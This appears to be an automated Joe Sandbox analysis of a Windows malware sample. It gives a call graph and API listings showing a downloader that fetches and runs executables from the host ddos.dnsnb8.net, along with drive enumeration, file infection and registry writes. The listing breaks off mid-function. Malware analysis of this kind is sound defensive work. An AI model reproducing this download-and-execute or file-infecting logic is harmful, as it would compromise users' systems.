API calls 1079->1080 1081 d114b4 1080->1081 1082 d11319 3 API calls 1081->1082 1083 d114c3 1082->1083 1084 d11319 3 API calls 1083->1084 1084->1065 1300 d1185b GetSystemTimeAsFileTime srand rand srand rand 1085->1300 1087 d11592 wsprintfA wsprintfA lstrlen CreateFileA 1088 d11633 1087->1088 1089 d115fb WriteFile CloseHandle 1087->1089 1088->1041 1089->1088 1090 d1161d ShellExecuteA 1089->1090 1090->1088 1092 d119a0 1091->1092 1093 d11ac7 1091->1093 1094 d119af CreateFileA 1092->1094 1093->1059 1093->1061 1095 d119c4 Sleep 1094->1095 1096 d11a28 GetFileSize 1094->1096 1095->1094 1097 d119d5 1095->1097 1098 d11a80 1096->1098 1099 d11a38 1096->1099 1112 d1185b GetSystemTimeAsFileTime srand rand srand rand 1097->1112 1102 d11a96 1098->1102 1103 d11a8d FindCloseChangeNotification 1098->1103 1099->1098 1101 d11a3d VirtualAlloc 1099->1101 1101->1098 1111 d11a53 1101->1111 1104 d11aad 1102->1104 1105 d11a9c DeleteFileA 1102->1105 1103->1102 1104->1093 1110 d11ab8 VirtualFree 1104->1110 1105->1104 1106 d119da wsprintfA CopyFileA 1106->1096 1108 d11a0d CreateFileA 1106->1108 1108->1096 1108->1105 1109 d11a59 ReadFile 1109->1098 1109->1111 1110->1093 1111->1098 1111->1109 1112->1106 1114 d12c09 WaitForMultipleObjects 1113->1114 1115 d12bc8 1113->1115 1117 d12c2a CreateThread 1114->1117 1118 d12c3c 1114->1118 1116 d12bfa lstrlen 1115->1116 1119 d12bd2 GetDriveTypeA 1115->1119 1120 d12be3 CreateThread 1115->1120 1116->1114 1116->1115 1117->1118 1124 d12845 1117->1124 1119->1115 1119->1116 1120->1116 1121 d12b7d 1120->1121 1134 d129e2 memset wsprintfA 1121->1134 1271 d1274a memset memset SHGetSpecialFolderPathA wsprintfA 1124->1271 1126 d12878 DeleteFileA 1127 d1289a 1126->1127 1128 d1288c VirtualFree 1126->1128 1129 d128a4 CloseHandle 1127->1129 1130 d128ab 1127->1130 1128->1127 1129->1130 1131 d12692 8 API calls 1132 d12853 1131->1132 1132->1126 1132->1131 1133 d1239d 186 API calls 1132->1133 1133->1132 1135 d12a3a memset lstrlen lstrcpyn strrchr 1134->1135 1136 d12abc memset memset FindFirstFileA 1134->1136 1135->1136 1137 d12a88 1135->1137 1148 d128b8 memset wsprintfA 1136->1148 1137->1136 1139 d12a9a lstrcmpiA 1137->1139 1141 d12b74 1139->1141 1142 d12aad lstrlen 1139->1142 1142->1136 1142->1139 1143 d12b61 FindNextFileA 1144 d12b23 1143->1144 1145 d12b6d FindClose 1143->1145 1146 d12b35 lstrcmpiA 1144->1146 1147 d128b8 174 API calls 1144->1147 1145->1141 1146->1144 1146->1145 1147->1143 1149 d12905 1148->1149 1158 d12951 memset 1148->1158 1150 d12956 strrchr 1149->1150 1151 d1291b memset wsprintfA 1149->1151 1149->1158 1153 d12967 lstrcmpiA 1150->1153 1150->1158 1152 d129e2 180 API calls 1151->1152 1152->1158 1154 d12988 lstrcmpiA 1153->1154 1155 d1297a 1153->1155 1156 d12994 1154->1156 1154->1158 1166 d11e6e 1155->1166 1159 d129ad strstr 1156->1159 1160 d129a5 lstrcpy 1156->1160 1158->1143 1161 d129d3 1159->1161 1162 d129cb 1159->1162 1160->1159 1231 d12692 1161->1231 1209 d1239d strstr 1162->1209 1167 d11e7d 1166->1167 1240 d11df6 strrchr 1167->1240 1170 d11eb0 SetFileAttributesA CreateFileA 1171 d12332 1170->1171 1172 d11edf 1170->1172 1173 d12346 1171->1173 1174 d1233d UnmapViewOfFile 1171->1174 1245 d11915 1172->1245 1176 d12350 1173->1176 1177 d1234b FindCloseChangeNotification 1173->1177 1174->1173 1179 d12391 1176->1179 1180 d12356 CloseHandle 1176->1180 1177->1176 1179->1158 1180->1179 1181 d11f2e 1181->1171 1251 d11c81 1181->1251 1185 d11f92 1186 d11c81 2 API calls 1185->1186 1187 d11f9f 1186->1187 1187->1171 1188 d11af9 169 API calls 1187->1188 1189 d12024 1187->1189 1193 d11fc0 1188->1193 1189->1171 1190 d11af9 169 API calls 1189->1190 1191 d1207a 1190->1191 1192 d11af9 169 API calls 1191->1192 1197 d12090 1192->1197 1193->1171 1193->1189 1194 d11af9 169 API calls 1193->1194 1195 d11ffe 1194->1195 1196 d12013 FlushViewOfFile 1195->1196 1196->1189 1198 d120bb memset memset 1197->1198 1199 d120f5 1198->1199 1200 d11c81 2 API calls 1199->1200 1201 d121de 1200->1201 1202 d12226 memcpy UnmapViewOfFile FindCloseChangeNotification 1201->1202 1256 d11b8a 1202->1256 1204 d1226e 1264 d1185b GetSystemTimeAsFileTime srand rand srand rand 1204->1264 1206 d122ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1207 d11915 3 API calls 1206->1207 1208 d1231f CloseHandle 1207->1208 1208->1171 1210 d12451 CreateFileA GetFileSize 1209->1210 1215 d123d8 1209->1215 1211 d12480 1210->1211 1212 d12675 CloseHandle 1210->1212 1211->1212 1216 d12499 1211->1216 1213 d1267c RemoveDirectoryA 1212->1213 1214 d12687 1213->1214 1214->1158 1215->1210 1215->1214 1217 d11915 3 API calls 1216->1217 1218 d124a4 9 API calls 1217->1218 1266 d1189d memset CreateProcessA 1218->1266 1221 d1255c Sleep memset wsprintfA 1222 d129e2 163 API calls 1221->1222 1223 d12597 memset wsprintfA Sleep 1222->1223 1224 d1189d 6 API calls 1223->1224 1225 d125e4 Sleep CreateFileA 1224->1225 1226 d11915 3 API calls 1225->1226 1227 d12610 CloseHandle 1226->1227 1227->1213 1228 d1261e 1227->1228 1228->1213 1229 d12641 SetFilePointer WriteFile 1228->1229 1229->1213 1230 d12667 SetEndOfFile 1229->1230 1230->1213 1232 d126b2 WaitForSingleObject 1231->1232 1233 d126a2 CreateEventA 1231->1233 1234 d126c1 lstrlen ??2@YAPAXI 1232->1234 1235 d12708 1232->1235 1233->1232 1236 d12736 SetEvent 1234->1236 1237 d126da lstrcpy 1234->1237 1235->1236 1238 d12718 lstrcpy ??3@YAXPAX 1235->1238 1236->1158 1239 d126f1 1237->1239 1238->1239 1239->1236 1241 d11e13 lstrcpy strrchr 1240->1241 1242 d11e62 1240->1242 1241->1242 1243 d11e40 lstrcmpiA 1241->1243 1242->1170 1242->1171 1243->1242 1244 d11e52 lstrlen 1243->1244 1244->1242 1244->1243 1246 d11928 1245->1246 1249 d11924 SetFilePointer CreateFileMappingA MapViewOfFile 1245->1249 1247 d1194f 1246->1247 1248 d1192e memset GetFileTime 1246->1248 1247->1249 1250 d11954 SetFileTime 1247->1250 1248->1249 1249->1171 1249->1181 1250->1249 1252 d11c9c 1251->1252 1254 d11c94 1251->1254 1253 d11cae memset memset 1252->1253 1252->1254 1253->1254 1254->1171 1255 d1185b GetSystemTimeAsFileTime srand rand srand rand 1254->1255 1255->1185 1257 d11b93 1256->1257 1265 d1185b GetSystemTimeAsFileTime srand rand srand rand 1257->1265 1259 d11bca srand 1260 d11bd8 rand 1259->1260 1261 d11c08 1260->1261 1261->1260 1262 d11c29 memset memcpy lstrcat 1261->1262 1262->1204 1264->1206 1265->1259 1267 d118e0 CloseHandle WaitForSingleObject 1266->1267 1268 d1190c 1266->1268 1269 d11907 CloseHandle 1267->1269 1270 d118fb GetExitCodeProcess 1267->1270 1268->1213 1268->1221 1269->1268 1270->1269 1280 d1185b GetSystemTimeAsFileTime srand rand srand rand 1271->1280 1273 d127b5 wsprintfA CopyFileA 1274 d12840 1273->1274 1275 d127de wsprintfA 1273->1275 1274->1132 1276 d11973 17 API calls 1275->1276 1277 d1280f 1276->1277 1278 d12820 CreateFileA 1277->1278 1279 d12813 DeleteFileA 1277->1279 1278->1274 1279->1278 1280->1273 1282 d11200 CloseHandle 1281->1282 1283 d111c6 AdjustTokenPrivileges 1281->1283 1282->1067 1284 d111f7 CloseHandle 1283->1284 1285 d111f6 1283->1285 1284->1282 1285->1284 1287 d11310 1286->1287 1288 d1123f GetCurrentProcessId OpenProcess 1286->1288 1287->1065 1295 d11319 1287->1295 1288->1287 1291 d11262 1288->1291 1289 d112b0 VirtualAlloc 1289->1291 1294 d112b8 1289->1294 1290 d112f1 CloseHandle 1290->1287 1292 d11302 VirtualFree 1290->1292 1291->1289 1291->1290 1293 d11296 VirtualFree 1291->1293 1291->1294 1292->1287 1293->1289 1294->1290 1296 d1134a 1295->1296 1297 d1132a GetModuleHandleA GetProcAddress 1295->1297 1298 d11351 memset 1296->1298 1299 d11363 1296->1299 1297->1296 1297->1299 1298->1299 1299->1065 1299->1074 1300->1087 1302 d11196 1301->1302 1303 d110ba 1301->1303 1303->1302 1319 d1185b GetSystemTimeAsFileTime srand rand srand rand 1303->1319 1305 d11118 wsprintfA wsprintfA URLDownloadToFileA 1306 d11168 lstrlen Sleep 1305->1306 1307 d110dc 1305->1307 1306->1303 1310 d11000 CreateFileA 1307->1310 1311 d11092 WinExec lstrlen 1310->1311 1312 d11025 GetFileSize CreateFileMappingA MapViewOfFile 1310->1312 1311->1302 1311->1303 1313 d11057 1312->1313 1314 d1107b 1312->1314 1317 d11074 UnmapViewOfFile 1313->1317 1318 d11061 1313->1318 1315 d11087 CloseHandle 1314->1315 1316 d1108d CloseHandle 1314->1316 1315->1316 1316->1311 1317->1314 1318->1317 1319->1305 1347 d12361 1348 d12374 1347->1348 1349 d1236b UnmapViewOfFile 1347->1349 1350 d12382 1348->1350 1351 d12379 CloseHandle 1348->1351 1349->1348 1352 d12391 1350->1352 1353 d12388 CloseHandle 1350->1353 1351->1350 1353->1352 1354 d16014 1355 d16035 GetModuleHandleA 1354->1355 1357 d1605f 1354->1357 1356 d1604d GetProcAddress 1355->1356 1358 d16058 1356->1358 1358->1356 1358->1357 1358->1358 1321 d16076 1322 d1607b 1321->1322 1323 d160c7 1321->1323 1322->1323 1325 d160b0 VirtualAlloc 1322->1325 1333 d161b2 1322->1333 1324 d1615f VirtualFree 1323->1324 1326 d16198 VirtualFree 1323->1326 1327 d160d5 VirtualAlloc 1323->1327 1324->1323 1325->1323 1326->1333 1327->1323 1328 d16389 VirtualProtect 1331 d163b7 1328->1331 1329 d163fc VirtualProtect 1330 d16400 1329->1330 1331->1329 1332 d163e7 VirtualProtect 1331->1332 1332->1329 1332->1331 1333->1328 1334 d162fb 1333->1334 1335 d16158 VirtualFree 1343 d160c7 1335->1343 1336 d16198 VirtualFree 1345 d161b2 1336->1345 1337 d160d5 VirtualAlloc 1337->1343 1338 d16389 VirtualProtect 1342 d163b7 1338->1342 1339 d163fc VirtualProtect 1340 d16400 1339->1340 1341 d1615f VirtualFree 1341->1343 1342->1339 1344 d163e7 VirtualProtect 1342->1344 1343->1336 1343->1337 1343->1341 1344->1339 1344->1342 1345->1338 1346 d162fb 1345->1346

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00D117D0 1 Function_00D16158 6 Function_00D166C8 1->6 2 Function_00D1185B 3 Function_00D1235D 4 Function_00D12845 7 Function_00D1274A 4->7 23 Function_00D12692 4->23 31 Function_00D1239D 4->31 5 Function_00D12C48 9 Function_00D11973 5->9 45 Function_00D12B8C 5->45 39 Function_00D16D00 6->39 40 Function_00D16B02 6->40 41 Function_00D16A84 6->41 7->2 7->9 8 Function_00D12CF0 9->2 10 Function_00D16CF2 14 Function_00D16CF8 10->14 11 Function_00D16076 11->6 12 Function_00D11DF6 13 Function_00D11AF9 52 Function_00D11638 13->52 15 Function_00D12B7D 20 Function_00D129E2 15->20 16 Function_00D114E1 16->13 16->52 17 Function_00D12361 30 Function_00D12D9B 17->30 18 Function_00D12D60 19 Function_00D16B63 48 Function_00D169B0 19->48 49 Function_00D16834 19->49 53 Function_00D167A4 19->53 51 Function_00D128B8 20->51 21 Function_00D11C68 22 Function_00D11E6E 22->2 22->12 22->13 22->18 22->21 25 Function_00D11915 22->25 22->30 36 Function_00D11C81 22->36 42 Function_00D11D8A 22->42 43 Function_00D11B8A 22->43 24 Function_00D16012 26 Function_00D16014 27 Function_00D11099 27->2 38 Function_00D11000 27->38 28 Function_00D11319 29 Function_00D11718 29->8 31->20 31->25 32 Function_00D1189D 31->32 33 Function_00D1119F 34 Function_00D1139F 34->28 34->33 47 Function_00D1120E 34->47 35 Function_00D16001 44 Function_00D1600A 35->44 37 Function_00D11581 37->2 38->0 39->10 39->19 39->48 40->19 41->10 46 Function_00D1680F 41->46 43->2 45->4 45->15 50 Function_00D16734 50->39 50->40 50->41 51->20 51->22 51->23 51->31 52->0 52->5 52->27 52->29 52->34 52->37 54 Function_00D165A6

                    Executed Functions

                    Function 00D129E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                    • String ID: %s*$C:\$Documents and Settings
                    • API String ID: 2826467728-110786608
                    • Opcode ID: 1064e2c73e3f0ae83fbc57320daa7afd1d2fa63b729321a9a29b69e15413edda
                    • Instruction ID: 14d92eef68b3b094b56f6da089f02b1d69bb46b3447e0fbac3d3babfa9cbbb50
                    • Opcode Fuzzy Hash: 1064e2c73e3f0ae83fbc57320daa7afd1d2fa63b729321a9a29b69e15413edda
                    • Instruction Fuzzy Hash: BE4130B2408349BFD720DFA0EC49DEB77ECEB84315F04482AF945D2111EA35D6998BB2
                    Function 00D11099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74stringsleepprocessCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 172 d11099-d110b4 173 d11199-d1119c 172->173 174 d110ba-d110c7 172->174 175 d110c8-d110d4 174->175 176 d11184-d11190 175->176 177 d110da 175->177 176->175 178 d11196-d11198 176->178 179 d11113-d11162 call d1185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 d11168-d11182 lstrlen Sleep 179->182 183 d110dc-d1110d call d11000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                    APIs
                      • Part of subcall function 00D1185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A38400,http://%s:%d/%s/%s,?,?,?,00D11118), ref: 00D11867
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11878
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11880
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11890
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11894
                    • WinExec.KERNEL32(?,00000005), ref: 00D110F1
                    • lstrlen.KERNEL32(00D14748), ref: 00D110FA
                    • wsprintfA.USER32 ref: 00D1112A
                    • wsprintfA.USER32 ref: 00D11143
                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00D1115B
                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00D11169
                    • Sleep.KERNEL32 ref: 00D11179
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                    • String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                    • API String ID: 1280626985-4120842960
                    • Opcode ID: e6b858abf54a70f840520d5fe8cbb62c012fc9918e757ad5cc32dff393a2ab54
                    • Instruction ID: 6e7a6b62a6d3dce24c316fe77817407bf6a0737799008abc1589980d7630b8d5
                    • Opcode Fuzzy Hash: e6b858abf54a70f840520d5fe8cbb62c012fc9918e757ad5cc32dff393a2ab54
                    • Instruction Fuzzy Hash: D1213D79900349BEDB20DBA0EC45BEEBBB9AB05315F158099E600A2151DF749AC5CFB0
                    Function 00D11718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 216 d11718-d11733 GetSystemTimeAsFileTime 217 d11735-d11752 SHSetValueA 216->217 218 d11754-d11758 216->218 219 d117c6-d117cd 217->219 218->219 220 d1175a-d11784 SHGetValueA 218->220 220->219 221 d11786-d117b3 call d12cf0 * 2 220->221 221->219 226 d117b5 221->226 227 d117b7-d117bd 226->227 228 d117bf 226->228 227->219 227->228 228->219
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D11729
                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00D1174C
                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00D1177C
                    • __aulldiv.LIBCMT ref: 00D11796
                    • __aulldiv.LIBCMT ref: 00D117A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: TimeValue__aulldiv$FileSystem
                    • String ID: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe$SOFTWARE\GTplus$Time
                    • API String ID: 541852442-4242687673
                    • Opcode ID: b89fa5ab7a4ad73a9b0768114be9b3d4eae209c3f3137706fb04cea8f14bf8e1
                    • Instruction ID: b35f9d1fece7788fb8a7708a2d71776badca871509ad3f64fc4e2e15be27dafc
                    • Opcode Fuzzy Hash: b89fa5ab7a4ad73a9b0768114be9b3d4eae209c3f3137706fb04cea8f14bf8e1
                    • Instruction Fuzzy Hash: 36112175A00309FBDB109A94E885FEE7BBDEB44B14F108115FA01B6280DA719A89CB74
                    Function 00D16076 Relevance: 11.1, APIs: 7, Instructions: 616memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 229 d16076-d16079 230 d160e0-d160eb 229->230 231 d1607b-d16080 229->231 234 d160ee-d160f4 230->234 232 d16082-d16085 231->232 233 d160f7-d160f8 231->233 237 d16087 232->237 238 d160f6 232->238 235 d160fa-d160fc call d166c8 233->235 236 d160fe-d16106 233->236 234->238 235->236 240 d16155-d16189 VirtualFree 236->240 241 d16108-d1611d 236->241 237->234 242 d16089-d16095 237->242 238->233 247 d1618c-d16192 240->247 243 d1611f-d16121 241->243 244 d160a1-d160aa 242->244 245 d16097-d1609f 242->245 248 d16151-d16154 243->248 249 d16123 243->249 250 d160b0-d160c1 VirtualAlloc 244->250 251 d161ba-d161c8 244->251 245->244 253 d160c7-d160cf 247->253 254 d16198-d161b0 VirtualFree 247->254 248->240 249->248 252 d16125-d16128 249->252 250->253 255 d16243-d16251 251->255 256 d161ca-d161d7 251->256 257 d16134-d1613b 252->257 258 d1612a-d1612e 252->258 253->247 259 d160d5-d160df VirtualAlloc 253->259 254->251 260 d161b2-d161b4 254->260 262 d16253 255->262 263 d16264-d1626f 255->263 261 d161dd-d161e0 256->261 273 d16130-d16132 257->273 274 d1613d-d1614f 257->274 258->257 258->273 259->230 260->251 261->255 268 d161e2-d161f2 261->268 264 d16255-d16258 262->264 265 d16271-d16276 263->265 264->263 270 d1625a-d16262 264->270 271 d16389-d163b1 VirtualProtect 265->271 272 d1627c-d16289 265->272 269 d161f5-d161fe 268->269 275 d16200-d16203 269->275 276 d1620c-d16219 269->276 270->264 277 d163b7-d163ba 271->277 288 d16292-d16298 272->288 289 d1628b 272->289 273->243 274->243 278 d16205-d16208 275->278 279 d1621b-d16228 275->279 281 d16238-d1623f 276->281 282 d163fc-d163ff VirtualProtect 277->282 283 d163bc-d163c2 277->283 284 d1622a-d16236 278->284 285 d1620a 278->285 279->281 281->269 286 d16241 281->286 287 d16400-d16416 282->287 283->283 290 d163c4 283->290 284->281 285->281 286->261 291 d16420-d16425 287->291 292 d16418-d1641d 287->292 293 d162a2-d162ac 288->293 289->288 290->282 294 d163c6-d163cf 290->294 295 d162b1-d162c8 293->295 296 d162ae 293->296 297 d163d1 294->297 298 d163d4-d163d8 294->298 301 d16373-d16384 295->301 302 d162ce-d162d4 295->302 296->295 297->298 299 d163da 298->299 300 d163dd-d163e1 298->300 299->300 303 d163e3 300->303 304 d163e7-d163fa VirtualProtect 300->304 301->265 305 d162d6-d162d9 302->305 306 d162da-d162f1 302->306 303->304 304->277 304->282 305->306 308 d162f3-d162f9 306->308 309 d16365-d1636e 306->309 310 d16314-d16326 308->310 311 d162fb-d1630f 308->311 309->293 313 d16328-d1634a 310->313 314 d1634c-d16360 310->314 312 d16426-d164a9 311->312 322 d16519-d1651c 312->322 323 d164ab-d164c0 312->323 313->309 314->312 324 d16583-d16587 322->324 325 d1651d-d1651e 322->325 329 d164c2 323->329 330 d16535-d16537 323->330 327 d16588-d1658b 324->327 328 d16522-d16533 325->328 331 d165a1-d165a3 327->331 332 d1658d-d1658f 327->332 328->330 335 d164c5-d164cd 329->335 336 d164f8 329->336 333 d16539 330->333 334 d1659a 330->334 337 d16591-d16593 332->337 338 d165b4 333->338 339 d1653b-d16541 333->339 340 d1659b-d1659d 334->340 341 d16542-d16545 335->341 342 d164cf-d164d4 335->342 343 d164fa-d164fe 336->343 344 d1656c-d1656f 336->344 337->340 345 d16595 337->345 350 d165be-d165db 338->350 339->341 340->337 346 d1659f 340->346 347 d1654d-d16550 341->347 348 d16517-d16518 342->348 349 d164d6-d164d9 342->349 351 d16500 343->351 352 d16572 343->352 344->352 345->334 346->327 347->350 355 d16552-d16556 347->355 348->322 349->347 356 d164db-d164f5 349->356 358 d165dd-d165f6 350->358 351->328 353 d16502 351->353 354 d16573-d16576 352->354 353->354 359 d16504-d16513 353->359 360 d16578-d1657a 354->360 355->360 361 d16558-d16569 355->361 356->336 362 d165f7-d16608 358->362 359->330 363 d16515 359->363 360->358 364 d1657c 360->364 361->344 363->348 364->362 365 d1657e-d1657f 364->365 365->324
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00D160BE
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00D160DF
                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00D16189
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D161A5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 4c93f63c97a8cd28e29faaf7153bb7ebbc86e4cb17bb4362d681305f95104bc6
                    • Instruction ID: 8bbdd334457c990cb9939804943482a39a4f6ed6eb293e32257d035a49627ec5
                    • Opcode Fuzzy Hash: 4c93f63c97a8cd28e29faaf7153bb7ebbc86e4cb17bb4362d681305f95104bc6
                    • Instruction Fuzzy Hash: E81244B2508785AFDB328F64DC45BEA3BB1EF02310F18459DE8898B193DB74E981C765
                    Function 00D12B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 366 d12b8c-d12bc6 memset GetLogicalDriveStringsA 367 d12c09-d12c28 WaitForMultipleObjects 366->367 368 d12bc8-d12bcc 366->368 371 d12c2a-d12c3a CreateThread 367->371 372 d12c3c-d12c45 367->372 369 d12bfa-d12c07 lstrlen 368->369 370 d12bce-d12bd0 368->370 369->367 369->368 370->369 373 d12bd2-d12bdc GetDriveTypeA 370->373 371->372 373->369 374 d12bde-d12be1 373->374 374->369 375 d12be3-d12bf6 CreateThread 374->375 375->369
                    APIs
                    • memset.MSVCRT ref: 00D12BA6
                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00D12BB4
                    • GetDriveTypeA.KERNEL32(?), ref: 00D12BD3
                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00D12BEE
                    • lstrlen.KERNEL32(?), ref: 00D12BFB
                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00D12C16
                    • CreateThread.KERNEL32(00000000,00000000,00D12845,00000000,00000000,00000000), ref: 00D12C3A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                    • String ID:
                    • API String ID: 1073171358-0
                    • Opcode ID: 5633105aee2876a2b19366174fcd329e07d9be8ff94f397d0b8a0969c2b95f15
                    • Instruction ID: 85aaffc3979e1d5b5867af02cdd53698a456a3b987a840f5bdcba587fecc0600
                    • Opcode Fuzzy Hash: 5633105aee2876a2b19366174fcd329e07d9be8ff94f397d0b8a0969c2b95f15
                    • Instruction Fuzzy Hash: 0B21A1B180024CBFEB209F64AC84DFE7BADFB08345B180125F942D2251DB318E56CB70
                    Function 00D11E6E Relevance: 30.4, APIs: 20, Instructions: 380fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 16 d11e6e-d11e95 call d12d60 19 d11e97 call d11d8a 16->19 20 d11e9c-d11eaa call d11df6 16->20 19->20 24 d11eb0-d11ed9 SetFileAttributesA CreateFileA 20->24 25 d12332 20->25 24->25 26 d11edf-d11f28 call d11915 SetFilePointer CreateFileMappingA MapViewOfFile 24->26 27 d12338-d1233b 25->27 26->25 36 d11f2e-d11f39 26->36 28 d12346-d12349 27->28 29 d1233d-d12340 UnmapViewOfFile 27->29 31 d12350-d12354 28->31 32 d1234b-d1234e FindCloseChangeNotification 28->32 29->28 34 d12391-d1239a call d12d9b 31->34 35 d12356-d1235b CloseHandle 31->35 32->31 35->34 36->25 37 d11f3f-d11f56 36->37 37->25 39 d11f5c-d11f64 37->39 39->25 41 d11f6a-d11f70 39->41 41->25 42 d11f76-d11f87 call d11c81 41->42 42->25 45 d11f8d-d11fa7 call d1185b call d11c81 42->45 45->25 50 d11fad-d11fb4 45->50 51 d12024-d12045 50->51 52 d11fb6-d11fc5 call d11af9 50->52 51->25 53 d1204b-d1204e 51->53 52->51 60 d11fc7-d11fd2 52->60 55 d12070-d120f4 call d11af9 * 2 call d11c68 * 2 memset * 2 53->55 56 d12050-d12053 53->56 78 d120f5-d120fe 55->78 58 d12056-d1205a 56->58 58->55 63 d1205c-d12061 58->63 60->25 62 d11fd8-d11fe7 60->62 65 d11fe9-d11fec 62->65 66 d11fef-d12006 call d11af9 62->66 63->25 67 d12067-d1206e 63->67 65->66 73 d12013-d1201e FlushViewOfFile 66->73 74 d12008-d1200e call d11c68 66->74 67->58 73->51 74->73 79 d12130-d12139 78->79 80 